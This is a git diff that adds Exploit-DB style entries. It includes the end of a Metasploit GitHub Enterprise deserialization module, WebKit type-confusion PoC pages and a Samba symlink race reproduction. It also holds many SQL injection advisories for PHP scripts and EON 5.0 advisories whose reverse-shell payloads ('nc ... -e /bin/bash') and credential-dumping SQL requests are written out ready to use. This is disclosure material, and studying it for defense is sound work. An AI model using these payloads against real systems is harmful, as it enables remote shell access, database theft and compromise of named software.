+    print_status('Sending serialized Ruby stager...')
+    send_serialized_data(dump, hmac)
+  end
+
+end
+
+=begin
+
+Handy information:
+
+To deobfuscate Github code, use this script:
+https://gist.github.com/wchen-r7/003bef511074b8bc8432e82bfbe0dd42
+
+Github Enterprise's Rack::Session::Cookie saves the session data into a cookie using this
+algorithm:
+
+* Takes the session hash (Json) in env['rack.session']
+* Marshal.dump the hash into a string
+* Base64 the string
+* Append a hash of the data at the end of the string to prevent tampering.
+* The signed data is saved in _gh_manage'
+
+The format looks like this:
+
+[ DATA ]--[ Hash ]
+
+Also see:
+https://github.com/rack/rack/blob/master/lib/rack/session/cookie.rb
+
+=end
\ No newline at end of file
diff --git a/platforms/multiple/dos/41741.html b/platforms/multiple/dos/41741.html
new file mode 100755
index 000000000..dd9771a46
--- /dev/null
+++ b/platforms/multiple/dos/41741.html
@@ -0,0 +1,56 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1036
+
+There is a type confusion vulnerability when calling DateTimeFormat.format. This function is provided as a bound function by a getter in the DateTimeFormat class. Binding the function ensures that the this object is of the right type. However, when the bound function is called, it calls into user script when converting the date parameter, which can call Function.caller, obtaining the unbound function. This type unsafe function can then be called on any type.
+
+A minimal PoC is as follows, and a full PoC is attached. 
+
+
+var i = new Intl.DateTimeFormat();
+var q;
+
+function f(){
+	q = f.caller;
+	return 10;
+}
+
+
+i.format({valueOf : f});
+
+q.call(0x77777777);
+-->
+
+<html>
+<body>
+<script>
+
+var date = new Date(Date.UTC(2012, 11, 20, 3, 0, 0));
+
+var i = new Intl.DateTimeFormat();
+
+//print(i);
+
+var q;
+
+function f(){
+
+	//print("in f");
+	//print(f.caller);
+	q = f.caller;
+	return 10;
+}
+
+try{
+i.format({valueOf : f});
+}catch(e){
+
+	//print("problem");
+
+}
+
+//print(q);
+q.call(0x77777777);
+
+</script>
+</body>
+</html>
diff --git a/platforms/multiple/dos/41742.html b/platforms/multiple/dos/41742.html
new file mode 100755
index 000000000..b76fa6056
--- /dev/null
+++ b/platforms/multiple/dos/41742.html
@@ -0,0 +1,55 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1032
+
+If a builtin script in webkit is in strict mode, but then calls a function that is not strict, this function is allowed to call Function.caller and can obtain a reference to the strict function. This is inconsistent with the behavior when executing non-builtin scripts in Safari, and the behavior in other browsers, where having a single strict function on the call stack forbids calls to Function.caller up to and including the first call to a strict function. This difference allows several sensitive native functions, such as arrayProtoPrivateFuncAppendMemcpy to be called directly, without the JavaScript wrappers that provide type and length checks.
+
+A minimal example of this issue is as follows, and a full example is attached.
+
+var q;
+function g(){
+	q = g.caller;
+	return 7;
+}
+
+
+var a = [1, 2, 3];
+a.length = 4;
+Object.defineProperty(Array.prototype, "3", {get : g});
+[4, 5, 6].concat(a);
+q(0x77777777, 0x77777777, 0);
+
+
+I strongly recommend this issue be fixed by changing the behaviour of Function.caller in strict mode, versus making changes to the natives, as it likely causes many similar problems 
+-->
+
+<html>
+<body>
+<script>
+
+var q;
+function g(){
+	//print("in g");
+	//print(arguments.caller);
+	//print(g.caller);
+	q = g.caller;
+	//print(g.caller);
+	return 7;
+
+}
+
+var a = [1, 2, 3];
+
+Object.defineProperty( Array.prototype, "1", { get : g} );
+
+
+var a = [1, 2, 3];
+a.length = 4;
+Object.defineProperty(Array.prototype, "3", {get : g});
+
+[4, 5, 6].concat(a);
+alert(q);
+q(0x7777, 0x7777, 0);
+
+</script>
+</body>
+</html>
diff --git a/platforms/multiple/dos/41743.html b/platforms/multiple/dos/41743.html
new file mode 100755
index 000000000..9ef97b29f
--- /dev/null
+++ b/platforms/multiple/dos/41743.html
@@ -0,0 +1,70 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1033
+
+There is an out-of-bounds read when reading the bound arguments array of a bound function. When Function.bind is called, the arguments to the call are transferred to an Array before they are passed to JSBoundFunction::JSBoundFunction. Since it is possible that the Array prototype has had a setter added to it, it is possible for user script to obtain a reference to this Array, and alter it so that the length is longer than the backing native butterfly array. Then when boundFunctionCall attempts to copy this array to the call parameters, it assumes the length is not longer than the allocated array (which would be true if it wasn't altered), and reads out of bounds.
+
+This is likely exploitable, because the read values are treated as JSValues, so this issue can allow type confusion if the attacker controls any of the unallocated values that are read.
+
+This issue is only in WebKit trunk and Safari preview, it hasn't made it to regular Safari releases yet.
+
+
+A minimal PoC is as follows, and a full PoC is attached.
+
+
+var ba;
+
+function s(){
+	ba = this;
+}
+
+
+function dummy(){
+	alert("just a function");
+}
+
+
+Object.defineProperty(Array.prototype, "0", {set : s });
+var f = dummy.bind({}, 1, 2, 3, 4);
+ba.length = 100000;
+f(1, 2, 3);
+-->
+
+<html>
+<body>
+<script>
+
+var ba;
+
+function s(){
+	alert("in s");
+	ba = this;
+}
+
+
+function g(){
+	alert("in g");
+	return 7;
+}
+
+
+function dummy(){
+	alert("just a function");
+}
+
+alert("start");
+
+try{
+Object.defineProperty(Array.prototype, "0", {set : s, get : g});
+var f = dummy.bind({}, 1, 2, 3, 4);
+alert("ba" + ba);
+ba.length = 100000;
+f(1, 2, 3);
+}catch(e){
+
+	alert(e.message);
+
+}
+
+</script>
+</body>
+</html>
diff --git a/platforms/multiple/remote/41740.txt b/platforms/multiple/remote/41740.txt
new file mode 100755
index 000000000..84f8b3f03
--- /dev/null
+++ b/platforms/multiple/remote/41740.txt
@@ -0,0 +1,94 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1039
+
+The Samba server is supposed to only grant access to configured share
+directories unless "wide links" are enabled, in which case the server is allowed
+to follow symlinks. The default (since CVE-2010-0926) is that wide links are
+disabled.
+
+smbd ensures that it isn't following symlinks by calling lstat() on every
+path component, as can be seen in strace (in reaction to the request
+"get a/b/c/d/e/f/g/h/i/j", where /public is the root directory of the share):
+
+root@debian:/home/user# strace -e trace=file -p18954
+Process 18954 attached
+lstat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
+getcwd("/public", 4096)                 = 8
+lstat("/public/a", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c/d", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c/d/e", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c/d/e/f", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c/d/e/f/g", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c/d/e/f/g/h", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c/d/e/f/g/h/i", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
+lstat("/public/a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
+stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
+getxattr("a/b/c/d/e/f/g/h/i/j", "system.posix_acl_access", 0x7ffc8d870c30, 132) = -1 ENODATA (No data available)
+stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
+open("a/b/c/d/e/f/g/h/i/j", O_RDONLY)   = 35
+
+
+This is racy: Any of the path components - either one of the directories or the
+file at the end - could be replaced with a symlink by an attacker over a second
+connection to the same share. For example, replacing a/b/c/d/e/f/g/h/i
+with a symlink  to / immediately before the open() call would cause smbd to open
+/j.
+
+To reproduce:
+
+ - Set up a server with Samba 4.5.2. (I'm using Samba 4.5.2 from Debian
+   unstable. I'm running the attacks on a native machine while the server is
+   running in a VM on the same machine.)
+ - On the server, create a world-readable file "/secret" that contains some
+   text. The goal of the attacker is to leak the contents of that file.
+ - On the server, create a directory "/public", mode 0777.
+ - Create a share named "public", accessible for guests, writable, with path
+   "/public".
+ - As the attacker, patch a copy of the samba-4.5.2 sourcecode with the patch in
+   attack_commands.patch.
+ - Build the patched copy of samba-4.5.2. The built smbclient will be used in
+   the following steps.
+ - Prepare the server's directory layout remotely and start the rename side of
+   the race:
+
+   $ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public
+   ./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it
+   Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian]
+   smb: \> posix
+   Server supports CIFS extensions 1.0
+   Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt
+   smb: /> ls
+     .                                   D        0  Wed Dec 14 23:54:30 2016
+     ..                                  D        0  Wed Dec 14 13:02:50 2016
+
+        98853468 blocks of size 1024. 66181136 blocks available
+   smb: /> symlink / link
+   smb: /> mkdir normal
+   smb: /> put /tmp/empty normal/secret # empty file
+   putting file /tmp/empty as /normal/secret (0.0 kb/s) (average 0.0 kb/s)
+   smb: /> rename_loop link normal foobar
+
+ - Over a second connection, launch the read side of the race:
+
+   $ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public
+   ./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it
+   Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian]
+   smb: \> posix
+   Server supports CIFS extensions 1.0
+   Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt
+   smb: /> dump foobar/secret
+
+ - At this point, the race can theoretically be hit. However, because the
+   renaming client performs operations synchronously, the network latency makes
+   it hard to win the race. (It shouldn't be too hard to adapt the SMB client to
+   be asynchronous, which would make the attack much more practical.) To make it
+   easier to hit the race, log in to the server as root and run "strace" against
+   the process that is trying to access foobar/secret all the time without any
+   filtering ("strace -p19624"). On my machine, this causes the race to be hit
+   every few seconds, and the smbclient that is running the "dump" command
+   prints the contents of the file each time the race is won.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41740.zip
diff --git a/platforms/php/webapps/41724.txt b/platforms/php/webapps/41724.txt
new file mode 100755
index 000000000..79327bc35
--- /dev/null
+++ b/platforms/php/webapps/41724.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Just Another Video Script 1.4.3 - SQL Injection
+# Google Dork: N/A
+# Date: 25.03.2017
+# Vendor Homepage: http://justanothervideoscript.com/
+# Software: http://justanothervideoscript.com/demo
+# Demo: http://javsdemo.com/
+# Version: 1.4.3
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/ajaxglobalfunc.php?func=addfav&vid_id=[SQL]
+# http://localhost/[PATH]/ajaxglobalfunc.php?func=flag&vid_id=[SQL]
+# http://localhost/[PATH]/ajaxplay.php?vidid=[SQL]
+# # # # #
+
diff --git a/platforms/php/webapps/41725.txt b/platforms/php/webapps/41725.txt
new file mode 100755
index 000000000..46182fd0f
--- /dev/null
+++ b/platforms/php/webapps/41725.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Adult Tube Video Script - SQL Injection
+# Google Dork: N/A
+# Date: 25.03.2017
+# Vendor Homepage: http://www.boysofts.com/
+# Software: http://www3.boysofts.com/xxx/freeadultvideotubescript.zip
+# Demo: http://www.boysofts.com/2013/12/free-adult-tube-video-script.html
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/single-video.php?video_id=[SQL]
+# http://localhost/[PATH]/search.php?page=[SQL]
+# single-video.php?video_id=25404991'+And(SelecT+1+FroM+(SelecT+CoUnT(*),ConCAT((SelecT(SelecT+ConCAT(CAST(DatabasE()+As+ChAr),0x7e,0x496873616e2053656e63616e))+FroM+information_schema.tables+WhErE+table_schema=DatabasE()+LImIt+0,1),FLooR(RanD(0)*2))x+FroM+information_schema.tables+GrOuP+By+x)a)++and+'userip'='userip
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41726.txt b/platforms/php/webapps/41726.txt
new file mode 100755
index 000000000..7462cae59
--- /dev/null
+++ b/platforms/php/webapps/41726.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Alibaba Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://b2bbusinessdirectoryscript.com/alibaba-clone-script.html
+# Demo: http://thealidemox.com
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL]
+# http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL]
+# http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41727.txt b/platforms/php/webapps/41727.txt
new file mode 100755
index 000000000..c88584f21
--- /dev/null
+++ b/platforms/php/webapps/41727.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Exploit Title: B2B Marketplace Script v2.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://eaglescripts.com/php-b2b-marketplace-script-v2
+# Demo: http://demob2b.xyz/
+# Version: 2.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL]
+# http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL]
+# http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL]
+# Etc...
+# # # # #
+
diff --git a/platforms/php/webapps/41728.txt b/platforms/php/webapps/41728.txt
new file mode 100755
index 000000000..50a31a40a
--- /dev/null
+++ b/platforms/php/webapps/41728.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Real Estate Property Pro Script - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://www.eaglescripts.com/php-property-portal-script
+# Demo: http://realpro.phpscriptsdemo.com/
+# Version: Pro
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/adsearch.html?&prc_min=[SQL]&prc_max=[SQL]
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41729.txt b/platforms/php/webapps/41729.txt
new file mode 100755
index 000000000..304c9642d
--- /dev/null
+++ b/platforms/php/webapps/41729.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Courier Tracking Software v6.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://www.eaglescripts.com/courier-tracking-software-ver-6
+# Demo: http://courierv6.couriersoftwares.com/
+# Version: 6.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/eaglecov6.php?c=other&f=show_news_details&view_id=[SQL]
+# http://localhost/[PATH]/eaglecov6.php?c=homepage&f=services&ser_id=[SQL]
+# user:username
+# user:hub_name
+# user:password
+# user:hidden_pass
+# user:entrydate
+# user:onlinestatus
+# user:status
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41730.txt b/platforms/php/webapps/41730.txt
new file mode 100755
index 000000000..29460001b
--- /dev/null
+++ b/platforms/php/webapps/41730.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Parcel Delivery Booking Script v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://www.eaglescripts.com/parcel-delivery-booking-script
+# Demo: http://parceldelivery.phpscriptsdemo.com/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/add_booking_shipment_first_step/1/1/1/1[SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41731.txt b/platforms/php/webapps/41731.txt
new file mode 100755
index 000000000..ef86973fe
--- /dev/null
+++ b/platforms/php/webapps/41731.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Delux Same Day Delivery Script v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://www.eaglescripts.com/delux-same-day-delivery
+# Demo: http://deluxesameday.logistic-softwares.com/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/show_page/[PAGE][SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41732.txt b/platforms/php/webapps/41732.txt
new file mode 100755
index 000000000..3e24cf7ee
--- /dev/null
+++ b/platforms/php/webapps/41732.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Hotel & Tour Package Script v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://www.eaglescripts.com/hotel-booking-script
+# Demo: http://hotelbooking.phpscriptsdemo.com/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/?show=view_offer&offer_id=[SQL]
+# http://localhost/[PATH]/view_news.php?news_id=[SQL]
+# http://localhost/[PATH]/page.php?id=[SQL]
+# http://localhost/[PATH]/?show=view_room&room_id=[SQL]
+# admin:id
+# admin:username
+# admin:password
+# booking:id
+# booking:cat_name
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41733.txt b/platforms/php/webapps/41733.txt
new file mode 100755
index 000000000..d6e0528ec
--- /dev/null
+++ b/platforms/php/webapps/41733.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Tour Package Booking v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: www.eaglescripts.com/tour-package-booking-script
+# Demo: http://tourbooking.phpscriptsdemo.com/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/package/category/1[SQL]
+# http://localhost/[PATH]/package_detail/1[SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41735.txt b/platforms/php/webapps/41735.txt
new file mode 100755
index 000000000..899348286
--- /dev/null
+++ b/platforms/php/webapps/41735.txt
@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Professional Bus Booking Script - SQL Injection
+# Google Dork: N/A
+# Date: 27.03.2017
+# Vendor Homepage: http://travelbookingscript.com/
+# Software: http://travelbookingscript.com/professional-bus-booking-script.html
+# Demo: http://travelbookingscript.com/demo/professional/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41736.txt b/platforms/php/webapps/41736.txt
new file mode 100755
index 000000000..7319083c6
--- /dev/null
+++ b/platforms/php/webapps/41736.txt
@@ -0,0 +1,23 @@
+# # # # #
+# Exploit Title: CouponPHP Script v3.1 - SQL Injection
+# Google Dork: N/A
+# Date: 27.03.2017
+# Vendor Homepage: http://couponphp.com/
+# Software: http://couponphp.com/demos
+# Demo: http://newdemo2.couponphp.com
+# Demo: http://newdemo3.couponphp.com
+# Version: 3.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/go.php?coupon_id=1&code=[SQL]
+# users
+#  id
+#  username
+#  password
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41746.txt b/platforms/php/webapps/41746.txt
new file mode 100755
index 000000000..33305c038
--- /dev/null
+++ b/platforms/php/webapps/41746.txt
@@ -0,0 +1,132 @@
+# [CVE-2017-6087] EON 5.0 Remote Code Execution
+
+## Description
+
+EyesOfNetwork ("EON") is an OpenSource network monitoring solution.
+
+## Remote Code Execution (authenticated)
+
+The Eonweb code does not correctly filter arguments, allowing
+authenticated users to execute arbitrary code.
+
+**CVE ID**: CVE-2017-6087
+
+**Access Vector**: remote
+
+**Security Risk**: high
+
+**Vulnerability**: CWE-78
+
+**CVSS Base Score**: 7.6
+
+**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
+
+
+### Proof of Concept 1
+
+On the attacker's host, we start a handler:
+
+```
+nc -lvp 1337
+```
+
+The `selected_events` parameter is not correctly filtered before it is
+used by the `shell_exec()` function.
+
+There, it is possible to inject a payload like in the request below,
+where we connect back to our handler:
+
+```
+https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;
+```
+
+#### Vulnerable code
+
+The payload gets injected into the `$event[$key]` and `$ged_command`
+variables of the `module/monitoring_ged/ged_functions.php` file, line 373:
+
+```
+$ged_command = "-update -type $ged_type_nbr ";
+foreach ($array_ged_packets as $key => $value) {
+  if($value["type"] == true){
+    if($key == "owner"){
+      $event[$key] = $owner;
+    }
+    $ged_command .= "\"".$event[$key]."\" ";
+  }
+}
+$ged_command = trim($ged_command, " ");
+shell_exec($path_ged_bin." ".$ged_command);
+```
+
+Two other functions in this file are also affected by this problem:
+
+* `delete($selected_events, $queue);`
+* `ownDisown($selected_events, $queue, $global_action);`
+
+
+### Proof of Concept 2
+
+On the attacker's host, we start a handler:
+
+```
+nc -lvp 1337
+```
+
+The `module` parameter is not correctly filtered before it is used by
+the `shell_exec()` function.
+
+Again, we inject our connecting back payload:
+
+```
+https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding
+```
+
+#### Vulnerable code
+
+In the `module/index.php` file, line 24, we can see that our payload is
+injected into the `exec()` function without any sanitization:
+
+```
+# Check optionnal module to load
+if(isset($_GET["module"]) && isset($_GET["link"])) {
+
+	$module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");
+
+	# Redirect to module page if rpm installed
+	if($module!=0) { header('Location: '.$_GET["link"].''); }
+
+}
+```
+
+
+## Timeline (dd/mm/yyyy)
+
+* 01/10/2016 : Initial discovery.
+* 09/10/2016 : Fisrt contact with vendor.
+* 23/10/2016 : Technical details sent to the security contact.
+* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
+* 11/10/2016 : Testing the patch revealed that it needed more work.
+* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
+* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
+repsonsible disclosure agreement.
+* 14/03/2017 : Public disclosure.
+
+Thank you to EON for the fast response.
+
+## Solution
+
+Update to version 5.1
+
+## Affected versions
+
+* Version <= 5.0
+
+## Credits
+
+* Nicolas SERRA <n.serra@sysdream.com>
+
+-- SYSDREAM Labs <labs@sysdream.com> 
+GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 
+* Website: https://sysdream.com/ * 
+Twitter: @sysdream 
\ No newline at end of file
diff --git a/platforms/php/webapps/41747.txt b/platforms/php/webapps/41747.txt
new file mode 100755
index 000000000..8e1c145d5
--- /dev/null
+++ b/platforms/php/webapps/41747.txt
@@ -0,0 +1,172 @@
+# [CVE-2017-6088] EON 5.0 Multiple SQL Injection
+
+## Description
+
+EyesOfNetwork ("EON") is an OpenSource network monitoring solution.
+
+## SQL injection (authenticated)
+
+The Eonweb code does not correctly filter arguments, allowing
+authenticated users to inject arbitrary SQL requests.
+
+**CVE ID**: CVE-2017-6088
+
+**Access Vector**: remote
+
+**Security Risk**: medium
+
+**Vulnerability**: CWE-89
+
+**CVSS Base Score**: 6.0
+
+**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L
+
+### Proof of Concept 1 (root privileges)
+
+The following HTTP request allows an attacker (connected as
+administrator) to dump the database contents using SQL injections inside
+either the `bp_name` or the `display` parameter. These requests are
+executed with MySQL root privileges.
+
+```
+https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271
+
+https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1
+```
+
+#### Vulnerable code
+
+The vulnerable code can be found inside the
+`module/monitoring_ged/ged_functions.php` file, line 114:
+
+```
+function list_process($bp,$display,$bdd){
+    $sql = "select name from bp where is_define = 1 and name!='".$bp."'
+and priority = '" . $display . "'";
+    $req = $bdd->query($sql);
+    $process = $req->fetchall();
+
+    echo json_encode($process);
+}
+```
+
+### Proof of Concept 2
+
+The following HTTP request allows an attacker to dump the database
+contents using SQL injections inside the `type` parameter:
+
+```
+https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=
+```
+
+#### Vulnerable code
+
+The vulnerable code can be found inside the
+`module/monitoring_ged/ajax.php` file, line 64:
+
+```
+if($_GET["type"] == 0){
+  $ged_where = "WHERE pkt_type_id!='0'";
+} else {
+  $ged_where = "WHERE pkt_type_id='".$_GET["type"]."'";
+}
+$gedsql_result1=sqlrequest($database_ged,"SELECT
+pkt_type_id,pkt_type_name FROM pkt_type $ged_where AND pkt_type_id<'100';");
+```
+
+### Proof of Concept 3
+
+The following HTTP request allows an attacker to dump the database
+contents using SQL injections inside the `search` parameter:
+
+```
+https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1&owner=&filter=equipment&search='+AND+(select+sleep(5))+AND+'1'='1&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=
+```
+
+
+#### Vulnerable code
+
+The vulnerable code can be found inside the
+`module/monitoring_ged/ged_functions.php` file, line 129.
+
+```
+if($search != ""){
+    $like = "";
+    if( substr($search, 0, 1) === '*' ){
+        $like .= "%";
+    }
+    $like .= trim($search, '*');
+    if ( substr($search, -1) === '*' ) {
+        $like .= "%";
+    }
+
+    $where_clause .= " AND $filter LIKE '$like'";
+}
+```
+
+
+### Proof of Concept 4
+
+The following HTTP request allows an attacker to dump the database
+contents using SQL injections inside the `equipment` parameter:
+
+```
+https://eonweb.local/module/monitoring_ged/ged_actions.php?action=advancedFilterSearch&filter=(select+user_passwd+from+eonweb.users+limit
+1)&queue=history
+```
+
+
+#### Vulnerable code
+
+The vulnerable code can be found inside the
+`module/monitoring_ged/ged_functions.php` file, line 493:
+
+```
+$gedsql_result1=sqlrequest($database_ged,"SELECT
+pkt_type_id,pkt_type_name FROM pkt_type WHERE pkt_type_id!='0' AND
+pkt_type_id<'100';");
+
+
+while($ged_type = mysqli_fetch_assoc($gedsql_result1)){
+    $sql = "SELECT DISTINCT $filter FROM
+".$ged_type["pkt_type_name"]."_queue_".$queue;
+
+    $results = sqlrequest($database_ged, $sql);
+    while($result = mysqli_fetch_array($results)){
+        if( !in_array($result[$filter], $datas) && $result[$filter] != "" ){
+            array_push($datas, $result[$filter]);
+        }
+    }
+}
+```
+
+
+## Timeline (dd/mm/yyyy)
+
+* 01/10/2016 : Initial discovery.
+* 09/10/2016 : Fisrt contact with vendor.
+* 23/10/2016 : Technical details sent to the security contact.
+* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
+* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
+* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
+repsonsible disclosure agreement.
+* 14/03/2017 : Public disclosure.
+
